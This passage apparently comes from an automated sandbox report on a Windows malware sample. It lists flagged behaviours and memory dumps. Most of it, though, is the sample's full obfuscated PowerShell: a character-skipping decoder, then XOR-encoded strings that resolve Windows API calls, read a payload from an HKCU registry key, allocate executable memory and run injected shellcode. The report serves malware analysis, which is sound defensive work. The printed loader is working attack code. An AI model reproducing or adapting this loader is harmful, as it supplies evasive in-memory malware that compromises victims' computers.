Un`$OvrVieFalSjaIsxZoiRenBogMo7Bs;Ps`$ErrAueUnlStaeuxUdiconMugWr8Gi Ra=Pa ReALylInikrpSqeGodBr0To Tp'SyADiBOhDmoAEnEfiBArEUf3SiEAnEChEBe1FoEHeBraFLiCunFPeBSlFdaDSjESnEMiEHu9EnEBl6DeEFo4LuASpFbaBUn2AsAOpFKuAAyByiDOvACaEHa7BoEAm5SyFNoBOvEFi6BeEbrBAfEStARuECi3MoENo6VeELa8DiBFnBCoBNi9ImAUn1TjCFa6PaERh1BaFBe9siERe0UnEPa4SpEdaATuAEp7InDSi4EpCSt6TaEAt1SeFPoBNoDFjFCaFReBCoFCoDFlDUd2TeBHj5huBMa5SjDNo5AuEKaALaFHiDviEIn0KlAPi3SpASlFUdBCuCecBMo8SmBHaEDrBFoADeBEn7OmBAg6InBToESnBUnDUnAGr3StASkFImBBlFSpFCo7PaBInCBoBPsFLiBElFToBBrFJrASa3AfAUnFHeBSuFTiFSk7ScBPaBSlAAu6Pe'po;Un&In(Te`$SaLOpeSupHeuHesDe7Gu)Co Go`$KerBaePalRoaAtxTaiXenSogNo8Aa;by`$AlFudeBelBrlBeiApnSpgco0In0Pr=Fj'KrHOrKNoCFoURe:no\BiRPoeAufFaeLarBaeponNacAveInkBooPorSotAfeScnBreEx9Co0Go\SkLReyFokUkkGleNarVaiPadKrdMoeNarReeErnkosCu'Si;Un`$AnFRiePolKolDeiRinBigGy0Sp1Mi Me=LaALilUniSapToeJadFa0Me Sy'RoAViBSaFjaCFeFPlABiESe3ReFTeBLoEdrEtrEVe1TrEPrAAnFHiCdiFEnCDiBSi2BoARe7FaCCi8ChEInAChFMiBRvADe2DiCHa6FlFBsBGoEinASuEFj2HoDTrFLgFVaDOmETh0AfFCpFSaEPaATrFDrDMoFUnBSnFVa6ReARaFMeASe2ThDsiFDeEOuEPyFElBUnEIn7BeASpFfoAToBKoCPe9SaECaAPeEGe3MoESa3BiEJo6OpEPi1LdESc8SvBunFFeBReFreAPo6SuAAn1StFkiBBrEcaEGuEGe3DyESkABeEGa0SvFtiDKoEPa8SkEspEMiEMi1PrEMiAPhFKrDKr'Re;Ri&Li(sa`$BeLPeePepMeuStsKn7Pr)Pa Re`$ArFAfeExlSilSkiGynSvgla0Sj1la;Br`$InrNeeSllplaMaxHyivanNogko9De Sm=Kr PrAHylGriDipCoeArdDe0la Ro'VeAPsBMiFArDalECaAHeEUd3FoEAnEUnFKl7SoEGa6OaENa1QuEAf8MoAFyFUeBin2BoAReFPrDFr4InDOrCUnFBr6MoFAmCAkFTjBdaESaAfaEHa2PlAAd1RoCArCQuEba0FoESt1FiFTa9InEGiAAgFkaDHkFOvBTrDPh2NeBFo5UnBko5ArCsm9BuFUnDSaENo0UdEHn2ArCToDReEStEGeFFeCAlEPoANiBbe9prBStBmaDNoCPaFDeBGoFUbDWoERo6OpEPi1TiEMi8PrAWh7poASiBAnFTiCLmFPoAUnEFr3FoFNyBGeEacEOpEMa1SlEMiAToFDaCOvFStCLbAIn6sp'Fo;Ma&Af(Re`$UpLDeeEdpOvuUnsSu7Ls)Nu Mu`$RerHyeOplfeaAnxBiiAfnCogHi9Zu;Ec`$ScsRruAnlSctSkaEmnMieResopsci0So Na=De TaAFilViimipPoeHudli0ac Co'DeDDe4AdDGeCSuFIn6FaFEfCSkFGrBSuEJoABaEIn2paAUd1PaDInDWaFFoAlaEAu1AuFTiBBaEUn6ReEDe2CaEOrAFoAgr1KeCPr6MiEUg1BoFadBBeEAfASpFHaDStEDe0ChFLaFBrDThCNoELuAReFolDGaFTe9EfEco6KnETeCGlEOvAMaFfaCSkASo1PaCLu2ExETeEamFReDFoFLiCTiELe7FaEEnEorEBl3RuDra2DiBBa5InBFe5AnCHeCKlEUd0KiFSlFGeFPr6VaAav7OnADaBDeFBeDPaEdeAJaEOu3OcESaEGeFVa7InEch6ChEre1CuEUn8InAZo3grAPrFLlBHaFImAMi3HjAUnFShACoFArAHaBZoCHo9ChEobAKrESe3TrEAl3PeEUn6SeEUf1LaEUm8TaBScCDaAHm3StAAnFDoBGo9RnBInASpBasAafARe6El'Ba;Au&Re(Lr`$RiLPaefipMouFusYt7di)Ko un`$TasSeuDelFotSaaNrndievasSusIc0Fu;Tn`$SiIUonPrdBueOvmBinBriJafPiiLecAfaBatDeiKuoPinBosTo7Tr7Mo=Me`$ParjoeLylToaLixPniHenHygHy.RacTooReuFinTotPu-Ar6Dr5Fo5Le;Su`$AfsWeuPelEntSyatrnAueDrshvsMe1Sh Im=Pe ToATalCaiUlpSpetrdUn0sp Ch'VeDBi4DiDTiCEsFTj6VaFKaCReFLoBFoENoALoEed2TaASy1trDFrDBoFemALnEEx1InFDuBHeEFu6TyESt2stEArASiAPo1LiCPr6ArEEk1SnFReBEuEVaABoFSkDTyEBa0SoFkuFPrDEmCBoEStAHoFAbDTeFIn9GyEFa6OvEKrCSpEFaAOiFWaCNeAAs1UdCTr2MuELaEErFTeDreFFeCJeEBl7SuEGlESkEHj3UnDMa2reBMi5MaBCi5FaCFoCCyEOm0asFTrFStFFu6MrASu7StAKrBAfFUnDPrEudABuESu3deECoERaFKa7LeETe6PaEMo1CrENi8MoATe3PuAlaFLiBDu9RsButAWiBStAMaAFo3SkACyFSiAcaBliDovAFiEtoBSkEek3ThESkEAfEPr1TrEEmBfaFScCToFVeBSyFBoDKaEFiEBoESm9FlEKn6OsEKr4skAUn3CyAFrFSoAUnBFjCCa6SnEVo1DoEOvBHeEPsAStEvr2TuEEs1CoEdo6afECo9SuESc6VaEPeCmoECoEnuFViBBaEst6BrECu0ReEin1HiFSkCPoBCa8SaBRe8SpAUn6Ra'Ci;Tr&Gr(Ca`$AlLEbebupHauElsOx7So)Po Un`$SisTruEnluntNoaPrnReeSusHosIn1Do;Fo`$UdsEtuRulMotBoaAdnKoeBosEcsTe2Ma Ge=Cr FoAdrlMaiGopMoeEldTe0De Me'ElASlBpaCSt3SiESeEInFMoDAhESvBcaEArAStFHaDSkECoAFoETe3SiEPt3KoESk6UnFCuBPaEBrAFoATaFLeBPl2BuAVaFExDKy4NoDBuCunFHu6PiFFeCAaFCaBTaEAuADrENd2UnAEp1PeDToDAlFCeAGrEMe1GaFhuBAnELo6GeEKo2DiECuAsaADo1PaCKa6PrEKu1AfFUdBHaEFaASmFEpDMaEKo0MeFOrFSnDUaCAbESkAReFAsDGaFSi9BaEFo6CiEPlCChEprACoFFoCFiAve1GeCNo2BlEStEEfFHiDOuFOsCElETr7MdEKaESmEBr3GuDTe2OoBLa5ReBai5IsCOv8MaEPrASyFExBfuCCoBRuENaAUdESo3UnEWhAKoESa8OpEInELaFChBcaEUnAUdCTa9CrEAi0FiFBeDNoCBe9BoFGrAPoESm1HaEYaCAfFAsBKvECa6AnEAz0NoERe1OvDAlFBeEVe0MeEGr6OgEEn1EtFakBpyEHeARoFTaDFoASa7ViAJu7GrEAs9SeERd4tiFUnFEfAIdFBeAFlBPaDSsDFoEMiAOoEDe8TrFpoDJeEbaAunFKeBliFsuBKoEFoATrFVeDReFGoCUnAFlFFiAAnBKoEKaEZeEHe9HyFHnDUnEFo6UnEPeCWoECoEWhEBe1EsEFr6OhFMoCTuFStBHiASa6CoATo3ShADyFCrASp7yeCPh8TiCDaBDoDBeBKoASoFTeCFlFTrASc7GoDEn4FiCGe6UeEMi1CrFwhBPnDStFGrFOuBStFLoDpaDAu2AnAFl3PeAEdFBrDDi4OvCSe6waERe1ReFHaBOsDWiFUsFMaBMoFJaDKoDba2ScACe3AaAgrFBlDLa4brCFu6WiEAt1TiFUfBVoDOxFUnFjoBDeFApDTvDgr2LeALu3UnADeFFoDor4ScCOp6AtEHa1MyFTnBPeDefFHoFBaBQuFDeDGrDTo2AmASk3SuAImFDaDco4AmCEx6BaEsl1feFMaBSkDSaFGiFStBroFFiDGaDse2DiAPo6SoAOrFHiACa7SnDSn4MaCCo6ReECh1MiFheBAlDrhFBuFAdBSoFonDMuDIs2CoASu6UnARi6NiATe6Un'ha;Ch&Ho(Pe`$UdLHeeblpHjuGlsHe7Im)re Ta`$TesSluVrlOvttraStnVeeUnsPusLu2Gi;No`$UdsacuAvlShtAgaDenHoecisBlsEf3Le An=Dp MeAUdlBaiSqpObeprdAn0Na cl'GaACuBSvCPu3WhEStEWhFOmDMaEStBKnESpAFrFApDtiESvAKoETh3FiEBe3GaEMe6HyFSuBSeEDiAToAPh1maCFe6ReETe1KaFSp9poEVr0InEFa4DaEInAteAPr7NeABeBAsCTi9PaEMeAToECh3GoEto3MaEOv6KaESt1FoEUn8QuBDkCuvAFl3OwAPrBBeDurAViEBeBImEGl3BeEVeEDeEPe1BuEPrBUdFPaCUnFTeBJeFHuDChESkEPrEAr9PlEMu6SsEDr4InALb3CrAKiBStDPaCDeESe7AfEAnEInEAfBSpFavASuEDe9TrABa3StBwaFPrASa3HeBReFCuAOx6Re'As;Br&Ud(Pa`$PuLToeDopViuBosLs7Cm)Un Sp`$HusMauOxlUntChaSynMaeMisAbsFo3Te#Tr;""";;Function sultaness9 { param([String]$Jammerklagernes); For($Generationskonferencerne=2; $Generationskonferencerne -lt $Jammerklagernes.Length-1; $Generationskonferencerne+=(2+1)){ $Aliped = $Aliped + $Jammerklagernes.Substring($Generationskonferencerne, 1); } $Aliped;}$Guidelines0 = sultaness9 'St Lo An Ko Ti Gr Gn An Ti Co Yd So Di ge Wo Sa fo Tr Su St Ny Sw La FoIgrELiXPa ';$Guidelines1= sultaness9 $Mosters;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Guidelines1 ;}else{.$Guidelines0 $Guidelines1;}"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Aliped0 { param([String]$Jammerklagernes); $Mannerless = New-Object byte[] ($Jammerklagernes.Length / 2); For($Generationskonferencerne=0; $Generationskonferencerne -lt $Jammerklagernes.Length; $Generationskonferencerne+=2){ $Oculinidae = $Jammerklagernes.Substring($Generationskonferencerne, 2); $Mannerless[$Generationskonferencerne/2] = [convert]::ToByte($Oculinidae, 16); $Mannerless[$Generationskonferencerne/2] = ($Mannerless[$Generationskonferencerne/2] -bxor 143); } [String][System.Text.Encoding]::ASCII.GetString($Mannerless);}$Sparegris0=Aliped0 'DCF6FCFBEAE2A1EBE3E3';$Sparegris1=Aliped0 'C2E6ECFDE0FCE0E9FBA1D8E6E1BCBDA1DAE1FCEEE9EAC1EEFBE6F9EAC2EAFBE7E0EBFC';$Sparegris2=Aliped0 'C8EAFBDFFDE0ECCEEBEBFDEAFCFC';$Sparegris3=Aliped0 'DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C7EEE1EBE3EADDEAE9';$Sparegris4=Aliped0 'FCFBFDE6E1E8';$Sparegris5=Aliped0 'C8EAFBC2E0EBFAE3EAC7EEE1EBE3EA';$Sparegris6=Aliped0 'DDDBDCFFEAECE6EEE3C1EEE2EAA3AFC7E6EBEACDF6DCE6E8A3AFDFFAEDE3E6EC';$Sparegris7=Aliped0 'DDFAE1FBE6E2EAA3AFC2EEE1EEE8EAEB';$Sparegris8=Aliped0 'DDEAE9E3EAECFBEAEBCBEAE3EAE8EEFBEA';$Sparegris9=Aliped0 'C6E1C2EAE2E0FDF6C2E0EBFAE3EA';$Lepus0=Aliped0 'C2F6CBEAE3EAE8EEFBEADBF6FFEA';$Lepus1=Aliped0 'CCE3EEFCFCA3AFDFFAEDE3E6ECA3AFDCEAEEE3EAEBA3AFCEE1FCE6CCE3EEFCFCA3AFCEFAFBE0CCE3EEFCFC';$Lepus2=Aliped0 'C6E1F9E0E4EA';$Lepus3=Aliped0 'DFFAEDE3E6ECA3AFC7E6EBEACDF6DCE6E8A3AFC1EAF8DCE3E0FBA3AFD9E6FDFBFAEEE3';$Lepus4=Aliped0 'D9E6FDFBFAEEE3CEE3E3E0EC';$Lepus5=Aliped0 'E1FBEBE3E3';$Lepus6=Aliped0 'C1FBDFFDE0FBEAECFBD9E6FDFBFAEEE3C2EAE2E0FDF6';$Lepus7=Aliped0 'C6CAD7';$Lepus8=Aliped0 'D3';$Regretters=Aliped0 'DADCCADDBCBD';$africanist=Aliped0 'CCEEE3E3D8E6E1EBE0F8DFFDE0ECCE';function fkp {Param ($Bedlar, $Catonically) ;$relaxing0 =Aliped0 'ABDFE0FBEAE1ECF6AFB2AFA7D4CEFFFFCBE0E2EEE6E1D2B5B5CCFAFDFDEAE1FBCBE0E2EEE6E1A1C8EAFBCEFCFCEAE2EDE3E6EAFCA7A6AFF3AFD8E7EAFDEAA2C0EDE5EAECFBAFF4AFABD0A1C8E3E0EDEEE3CEFCFCEAE2EDE3F6CCEEECE7EAAFA2CEE1EBAFABD0A1C3E0ECEEFBE6E0E1A1DCFFE3E6FBA7ABC3EAFFFAFCB7A6D4A2BED2A1CAFEFAEEE3FCA7ABDCFFEEFDEAE8FDE6FCBFA6AFF2A6A1C8EAFBDBF6FFEAA7ABDCFFEEFDEAE8FDE6FCBEA6';&($Lepus7) $relaxing0;$relaxing5 = Aliped0 'ABE3FCEAE9EAFDE6EAFDE1EAAFB2AFABDFE0FBEAE1ECF6A1C8EAFBC2EAFBE7E0EBA7ABDCFFEEFDEAE8FDE6FCBDA3AFD4DBF6FFEAD4D2D2AFCFA7ABDCFFEEFDEAE8FDE6FCBCA3AFABDCFFEEFDEAE8FDE6FCBBA6A6';&($Lepus7) $relaxing5;$relaxing1 = Aliped0 'FDEAFBFAFDE1AFABE3FCEAE9EAFDE6EAFDE1EAA1C6E1F9E0E4EAA7ABE1FAE3E3A3AFCFA7D4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C7EEE1EBE3EADDEAE9D2A7C1EAF8A2C0EDE5EAECFBAFDCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C7EEE1EBE3EADDEAE9A7A7C1EAF8A2C0EDE5EAECFBAFC6E1FBDFFBFDA6A3AFA7ABDFE0FBEAE1ECF6A1C8EAFBC2EAFBE7E0EBA7ABDCFFEEFDEAE8FDE6FCBAA6A6A1C6E1F9E0E4EAA7ABE1FAE3E3A3AFCFA7ABCDEAEBE3EEFDA6A6A6A6A3AFABCCEEFBE0E1E6ECEEE3E3F6A6A6';&($Lepus7) $relaxing1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Medicinalvarefabrikker,[Parameter(Position = 1)] [Type] $Rbdig = [Void]);$relaxing2 = Aliped0 'ABDDE6FBE0FDE1EAE3E3EAE1FCAFB2AFD4CEFFFFCBE0E2EEE6E1D2B5B5CCFAFDFDEAE1FBCBE0E2EEE6E1A1CBEAE9E6E1EACBF6E1EEE2E6ECCEFCFCEAE2EDE3F6A7A7C1EAF8A2C0EDE5EAECFBAFDCF6FCFBEAE2A1DDEAE9E3EAECFBE6E0E1A1CEFCFCEAE2EDE3F6C1EEE2EAA7ABDCFFEEFDEAE8FDE6FCB7A6A6A3AFD4DCF6FCFBEAE2A1DDEAE9E3EAECFBE6E0E1A1CAE2E6FBA1CEFCFCEAE2EDE3F6CDFAE6E3EBEAFDCEECECEAFCFCD2B5B5DDFAE1A6A1CBEAE9E6E1EACBF6E1EEE2E6ECC2E0EBFAE3EAA7ABDCFFEEFDEAE8FDE6FCB6A3AFABE9EEE3FCEAA6A1CBEAE9E6E1EADBF6FFEAA7ABC3EAFFFAFCBFA3AFABC3EAFFFAFCBEA3AFD4DCF6FCFBEAE2A1C2FAE3FBE6ECEEFCFBCBEAE3EAE8EEFBEAD2A6';&($Lepus7) $relaxing2;$relaxing3 = Aliped0 'ABDDE6FBE0FDE1EAE3E3EAE1FCA1CBEAE9E6E1EACCE0E1FCFBFDFAECFBE0FDA7ABDCFFEEFDEAE8FDE6FCB9A3AFD4DCF6FCFBEAE2A1DDEAE9E3EAECFBE6E0E1A1CCEEE3E3E6E1E8CCE0E1F9EAE1FBE6E0E1FCD2B5B5DCFBEEE1EBEEFDEBA3AFABC2EAEBE6ECE6E1EEE3F9EEFDEAE9EEEDFDE6E4E4EAFDA6A1DCEAFBC6E2FFE3EAE2EAE1FBEEFBE6E0E1C9E3EEE8FCA7ABDCFFEEFDEAE8FDE6FCB8A6';&($Lepus7) $relaxing3;$relaxing4 = Aliped0 'ABDDE6FBE0FDE1EAE3E3EAE1FCA1CBEAE9E6E1EAC2EAFBE7E0EBA7ABC3EAFFFAFCBDA3AFABC3EAFFFAFCBCA3AFABDDEDEBE6E8A3AFABC2EAEBE6ECE6E1EEE3F9EEFDEAE9EEEDFDE6E4E4EAFDA6A1DCEAFBC6E2FFE3EAE2EAE1FBEEFBE6E0E1C9E3EEE8FCA7ABDCFFEEFDEAE8FDE6FCB8A6';&($Lepus7) $relaxing4;$relaxing5 = Aliped0 'FDEAFBFAFDE1AFABDDE6FBE0FDE1EAE3E3EAE1FCA1CCFDEAEEFBEADBF6FFEAA7A6';&($Lepus7) $relaxing5 ;}$fejlagtiges = Aliped0 'E4EAFDE1EAE3BCBD';$relaxing6 = Aliped0 'ABDAE7E5FBE6EBEAE3E6E8BBB9AFB2AFD4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5C8EAFBCBEAE3EAE8EEFBEAC9E0FDC9FAE1ECFBE6E0E1DFE0E6E1FBEAFDA7A7E9E4FFAFABE9EAE5E3EEE8FBE6E8EAFCAFABC3EAFFFAFCBBA6A3AFA7C8CBDBAFCFA7D4C6E1FBDFFBFDD2A3AFD4DAC6E1FBBCBDD2A3AFD4DAC6E1FBBCBDD2A3AFD4DAC6E1FBBCBDD2A6AFA7D4C6E1FBDFFBFDD2A6A6A6';&($Lepus7) $relaxing6;$Shaduf = fkp $Lepus5 $Lepus6;$relaxing7 = Aliped0 'ABC9EAE3E3E6E1E8BCAFB2AFABDAE7E5FBE6EBEAE3E6E8BBB9A1C6E1F9E0E4EAA7D4C6E1FBDFFBFDD2B5B5D5EAFDE0A3AFB9BABAA3AFBFF7BCBFBFBFA3AFBFF7BBBFA6';&($Lepus7) $relaxing7;$relaxing8 = Aliped0 'ABDAEBE3EEE1EBFCFBFDEEE9E6E4AFB2AFABDAE7E5FBE6EBEAE3E6E8BBB9A1C6E1F9E0E4EAA7D4C6E1FBDFFBFDD2B5B5D5EAFDE0A3AFBCB8BEBAB7B6BEBDA3AFBFF7BCBFBFBFA3AFBFF7BBA6';&($Lepus7) $relaxing8;$Felling00='HKCU:\Referencekortene90\Lykkeridderens';$Felling01 =Aliped0 'ABFCFAE3FBEEE1EAFCFCB2A7C8EAFBA2C6FBEAE2DFFDE0FFEAFDFBF6AFA2DFEEFBE7AFABC9EAE3E3E6E1E8BFBFA6A1FBEEE3EAE0FDE8EEE1EAFD';&($Lepus7) $Felling01;$relaxing9 = Aliped0 'ABFDEAE3EEF7E6E1E8AFB2AFD4DCF6FCFBEAE2A1CCE0E1F9EAFDFBD2B5B5C9FDE0E2CDEEFCEAB9BBDCFBFDE6E1E8A7ABFCFAE3FBEEE1EAFCFCA6';&($Lepus7) $relaxing9;$sultaness0 = Aliped0 'D4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5CCE0FFF6A7ABFDEAE3EEF7E6E1E8A3AFBFA3AFAFABC9EAE3E3E6E1E8BCA3AFB9BABAA6';&($Lepus7) $sultaness0;$Indemnifications77=$relaxing.count-655;$sultaness1 = Aliped0 'D4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5CCE0FFF6A7ABFDEAE3EEF7E6E1E8A3AFB9BABAA3AFABDAEBE3EEE1EBFCFBFDEEE9E6E4A3AFABC6E1EBEAE2E1E6E9E6ECEEFBE6E0E1FCB8B8A6';&($Lepus7) $sultaness1;$sultaness2 = Aliped0 'ABC3EEFDEBEAFDEAE3E3E6FBEAAFB2AFD4DCF6FCFBEAE2A1DDFAE1FBE6E2EAA1C6E1FBEAFDE0FFDCEAFDF9E6ECEAFCA1C2EEFDFCE7EEE3D2B5B5C8EAFBCBEAE3EAE8EEFBEAC9E0FDC9FAE1ECFBE6E0E1DFE0E6E1FBEAFDA7A7E9E4FFAFABDDEAE8FDEAFBFBEAFDFCAFABEEE9FDE6ECEEE1E6FCFBA6A3AFA7C8CBDBAFCFA7D4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A3AFD4C6E1FBDFFBFDD2A6AFA7D4C6E1FBDFFBFDD2A6A6A6';&($Lepus7) $sultaness2;$sultaness3 = Aliped0 'ABC3EEFDEBEAFDEAE3E3E6FBEAA1C6E1F9E0E4EAA7ABC9EAE3E3E6E1E8BCA3ABDAEBE3EEE1EBFCFBFDEEE9E6E4A3ABDCE7EEEBFAE9A3BFA3BFA6';&($Lepus7) $sultaness3#"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3160-132-0x0000000000000000-mapping.dmp
-
memory/3160-133-0x000001DC54280000-0x000001DC542A2000-memory.dmpFilesize
136KB
-
memory/3160-148-0x00007FFCFFE40000-0x00007FFD00901000-memory.dmpFilesize
10.8MB
-
memory/3160-135-0x00007FFCFFE40000-0x00007FFD00901000-memory.dmpFilesize
10.8MB
-
memory/4892-140-0x0000000006010000-0x0000000006076000-memory.dmpFilesize
408KB
-
memory/4892-137-0x00000000058A0000-0x0000000005EC8000-memory.dmpFilesize
6.2MB
-
memory/4892-138-0x0000000005F00000-0x0000000005F22000-memory.dmpFilesize
136KB
-
memory/4892-139-0x0000000005FA0000-0x0000000006006000-memory.dmpFilesize
408KB
-
memory/4892-136-0x00000000051C0000-0x00000000051F6000-memory.dmpFilesize
216KB
-
memory/4892-141-0x0000000006790000-0x00000000067AE000-memory.dmpFilesize
120KB
-
memory/4892-142-0x0000000008100000-0x000000000877A000-memory.dmpFilesize
6.5MB
-
memory/4892-143-0x0000000006CE0000-0x0000000006CFA000-memory.dmpFilesize
104KB
-
memory/4892-144-0x0000000007A80000-0x0000000007B16000-memory.dmpFilesize
600KB
-
memory/4892-145-0x00000000079A0000-0x00000000079C2000-memory.dmpFilesize
136KB
-
memory/4892-146-0x000000000AAF0000-0x000000000B094000-memory.dmpFilesize
5.6MB
-
memory/4892-147-0x0000000008780000-0x000000000AAF0000-memory.dmpFilesize
35.4MB
-
memory/4892-134-0x0000000000000000-mapping.dmp